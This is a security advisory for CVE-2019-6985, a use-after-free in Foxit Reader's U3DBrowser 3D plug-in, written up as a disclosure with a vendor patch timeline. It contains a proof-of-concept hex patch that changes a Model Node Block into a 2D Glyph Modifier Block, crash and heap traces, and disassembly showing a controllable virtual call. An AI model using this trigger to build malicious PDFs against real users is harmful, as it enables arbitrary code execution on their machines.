CVE: CVE-2019-6985
Tested Versions:
- Foxit Reader 9.1.0.5096, U3DBrowser.fpi 9.1.0.425
Product URL(s):
Description of the vulnerability
Foxit Reader is a popular PDF reading and printing software. It provides compatibility to the ECMA-363 Standard (Universal 3D File Format) via the U3DBrowser plug-in, which allows viewing embedded 3D annotations in PDF files. Up to version 9.0.1.1049 the plug-in is loaded in its default installation package, subsequent version continues the support to its user base with the plug-in separately acquired.
Any PDF file that embeds certain specially crafted 3D content, specifically, a malformed 2D Glyph Modifier Block with a specific Chain Index, could result in a use-after-free that allows using controllable memory for a direct virtual call.
(c74.1568): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=14638f80 ebx=66eb6140 ecx=1443afd0 edx=14636fd4 esi=14696fe8 edi=14636fd4
eip=66eb6157 esp=002cd6ac ebp=002cd6b0 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206
U3DBrowser!PlugInMain+0x18417:
66eb6157 8b01 mov eax,dword ptr [ecx] ds:0023:1443afd0=????????
0:000> u
U3DBrowser!PlugInMain+0x18417:
66eb6157 8b01 mov eax,dword ptr [ecx]
66eb6159 8b00 mov eax,dword ptr [eax]
66eb615b 57 push edi
66eb615c 8b7e08 mov edi,dword ptr [esi+8]
66eb615f 57 push edi
66eb6160 6a00 push 0
66eb6162 ffd0 call eax
66eb6164 56 push esi
0:000> !heap -p -a ecx
address 1443afd0 found in
_DPH_HEAP_ROOT @ bd91000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
143c1784: 1443a000 2000
6d26a1e2 verifier!AVrfDebugPageHeapFree+0x000000c2
76f07809 ntdll!RtlDebugFreeHeap+0x0000002f
76ed4dee ntdll!RtlpFreeHeap+0x00000060
76e8ddf0 ntdll!RtlFreeHeap+0x00000142
7540c8f9 kernel32!HeapFree+0x00000014
6a5c016a MSVCR100!free+0x0000001c
66f91c00 U3DBrowser!PlugInMain+0x000f3ec0
66f9312f U3DBrowser!PlugInMain+0x000f53ef
66f9369a U3DBrowser!PlugInMain+0x000f595a
66f1f979 U3DBrowser!PlugInMain+0x00081c39
66f1faab U3DBrowser!PlugInMain+0x00081d6b
[ ... ]
When processing a carefully crafted PDF with 3D stream containing a displaced 2D Glyph Modifier Block (type 0xFFFFFF41) with a specific Chain Index value, an attacker can potentially achieve arbitrary code execution at the privilege of the logged on user.
Original Model Node Block of type 0xffffff22:
00000510: 00 00 00 00 02 00 00 00 22 ff ff ff 65 00 00 00 ........"...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 05 ......Box04.....
00000530: 00 42 6f 78 30 33 00 00 80 3f 00 00 00 00 00 00 .Box03...?......
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00 .............?..
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 80 3f 00 00 00 00 4b b1 ba c1 44 05 b8 c1 00 00 .?....K...D.....
00000570: 00 00 00 00 80 3f 0d 00 4c 69 67 68 74 42 6f 78 .....?..LightBox
00000580: 4d 6f 64 65 6c 01 00 00 00 00 00 00 45 ff ff ff Model.......E...
PoC: changing the block type to 0xffffff41:
00000510: 00 00 00 00 02 00 00 00 41 ff ff ff 65 00 00 00 ........A...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 05 ......Box04.....
00000530: 00 42 6f 78 30 33 00 00 80 3f 00 00 00 00 00 00 .Box03...?......
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00 .............?..
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 80 3f 00 00 00 00 4b b1 ba c1 44 05 b8 c1 00 00 .?....K...D.....
00000570: 00 00 00 00 80 3f 0d 00 4c 69 67 68 74 42 6f 78 .....?..LightBox
00000580: 4d 6f 64 65 6c 01 00 00 00 00 00 00 45 ff ff ff Model.......E...
Only the Chain Index 0x1 are necessary, the following almost completely zero-ed 0xffffff41 block reaches the same crash:
00000510: 00 00 00 00 02 00 00 00 41 ff ff ff 65 00 00 00 ........A...e...
00000520: 00 00 00 00 05 00 42 6f 78 30 34 01 00 00 00 01 ......Box04.....
00000530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000570: 00 00 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................
00000580: 00 00 00 00 00 00 00 00 00 00 00 00 45 ff ff ff ............E...
From the crash site onwards, it is clear that the referenced object is entirely in free-ed allocation, it is straightforward to control the virtual table and value of eax at .text:10026162:
.text:10026155 mov ecx, [esi]
.text:10026157 mov eax, [ecx] ; Use-after-Free
.text:10026159 mov eax, [eax] ; fetch controlled vtable[0]
.text:1002615B push edi
.text:1002615C mov edi, [esi+8]
.text:1002615F push edi
.text:10026160 push 0
.text:10026162 call eax ; controlled virtual call
The vulnerability is triggered by changing a Model Node Block (0xffffff22) that is embedded in a Modifier Chain (0xffffff14) to a 2D Glyph Modifier Block (0xffffff41). By the ECMA-363 standard, typically Modifier Blocks (0xffffff41 - 0xffffff46) are standalone, whereas Modifier Declaration Blocks must be contained in a Modifier Chain Block.
Timeline:
- 2018-11-28 Vendor disclosure
- 2019-01-03 Vendor patched
Vendor Response
The vendor has patched the 3D plugin and acknowledged the security issues at https://www.foxitsoftware.com/support/security-bulletins.php.